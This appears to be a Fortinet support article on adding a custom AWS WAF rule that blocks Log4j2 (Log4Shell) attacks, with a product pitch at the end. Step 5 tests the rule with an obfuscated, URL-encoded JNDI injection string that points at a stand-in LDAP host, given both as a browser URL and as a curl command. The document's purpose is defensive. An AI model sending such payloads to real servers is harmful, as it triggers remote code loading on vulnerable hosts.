| Description | This article describes how to manually create a custom signature on AWS WAF to block attacks on web servers hosted on AWS and using the Log4j2 library. This should be added on top of the Fortinet Managed Rules. |
| Scope | |
| Solution |
Please follow the steps below to manually configure a new security rule on AWS WAF:
1. Make sure Fortinet rules are already in place. The following screenshots shows the rules on AWS WAF v1 and v2 respectively. It’s suggested to use v2 as it provides more powerful protection.
2. Now go to the Rules column of your Web ACL to add a new rule
3. In Rule Builder, enter a name for the rule, then select Regular rule. 
4. Scroll down and set your statements as shown in the screenshot. Note: We won’t list the regular expression in this article because it should not be exposed publicly due to security reasons. Please contact Fortinet support team to get it. 
Because AWS WAF doesn't support all header inspection types automatically you need to add the headers one by one with the same regex pattern. It’s recommended to add at least the common headers such as Cookie, Referer, etc. The more, the better.
5. After configuring the rule test it in the following way: a. Use your browser to access the address like, http://your-domain/?24%7B%24%7Benv%3Afoo%3A-jndi%7D%3Aldap%3A%2F%2Ftest.example.com%2Fexp.
A 403 error page will return if it works. b. Use command line tool curl to run: $curl ‘http://your-domain/?%24%7B%24%7Benv%3Afoo%3A-jndi%7D%3Aldap%3A%2F%2Ftest.example.com%2Fexp’ The following output should print if it works 
As variants continue to emerge, even if security rules are configured on AWS WAF, a more robust solution should be considered. FortiWeb’s SaaS based WAF solution is a good complement. It protects public cloud hosted web applications from the OWASP Top 10, zero day threats, and other application layer attacks. Subscribe it here: https://aws.amazon.com/marketplace/pp/prodview-rbkvcwsvcpgsk |
